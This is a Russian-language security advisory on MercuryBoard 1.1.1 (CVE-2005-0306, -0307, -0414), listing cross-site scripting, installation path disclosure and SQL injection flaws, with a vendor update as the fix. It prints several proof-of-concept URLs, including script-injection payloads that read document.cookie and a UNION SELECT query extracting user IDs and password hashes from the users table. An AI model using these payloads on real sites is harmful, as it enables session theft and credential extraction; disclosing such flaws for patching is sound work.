Раскрытие информации, межсайтовый скриптинг и SQL-инъекция в MercuryBoard

Дата публикации:
26.01.2005
Дата изменения:
20.05.2008
Всего просмотров:
1117
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-0306
CVE-2005-0307
CVE-2005-0414
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
MercuryBoard 1.x
Уязвимые версии: MercuryBoard 1.1.1

Описание:
Уязвимость в MercuryBoard позволяет удаленному пользователю произвести XSS нападение, выполнить SQL-инъекцию и получить информацию об установочной директории приложения на сервере.

Уязвимость сущетвуте из-за недостаточной проверки данных в параметре ‘s’ сценария 'func/pm.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере целевого пользователя. Пример:

http://[target]/index.php?a=pm&s= '><script>alert(document.cookie)</script>

Недостаточная обработка данных в параметре ‘i’ сценария 'func/members.php' позволяте удаленному пользователю произвести XSS нападение. Пример:

http://[target]/index.php?a=members&l= '><script>alert(document.cookie)</script>

Также уязвимы другие параметры: http://[target]/index.php?a='><script>alert(document.cookie)</script >
http://[target]/index.php?a=post&s='><script>alert(document.cookie)</script>
http://[target]/index.php?a=post&s=reply&t='><script>alert(document.cookie)</script>
htt p://[target]/index.php?a=pm&s=send&to='><script>alert(document.cookie)</script>
http://[target]/index.php?a=pm&s=send&to=2&re='><script>alert(document.cookie)</script>
http://[target]/index.php?a=cp&s='><script>alert(document.cookie)</script>

Удаленный пользователь может получить информацию об установочной директории на сервере из-за уязвимости в сценарии 'global.php'. Пример:

http://[target]/index.php?a=forum&f=2&min=0&n=0

Также уязвимы сценарии:

lib/jpgraph/jpgraph_bar.php
lib/jpgraph/jpgraph_log.php
lib/jpgraph/jpgraph_polar.php
admincp/admin.php
и все сценарии в директории func.

Удаленный авторизованный пользователь может выполнить произвольные SQL команды на системе. Пример:

http://[target]/index.php?a=post&s=reply &t=0%20UNION%20SELECT%20user_id, %20user_password%20FROM%20mb_users%20/*

URL производителя: http://www.mercuryboard.com

Решение: Установите обновление
http://www.mercuryboard.com/index.php?a=downloads

Ссылки: Multiple vulnerabilities in MercuryBoard 1.1.1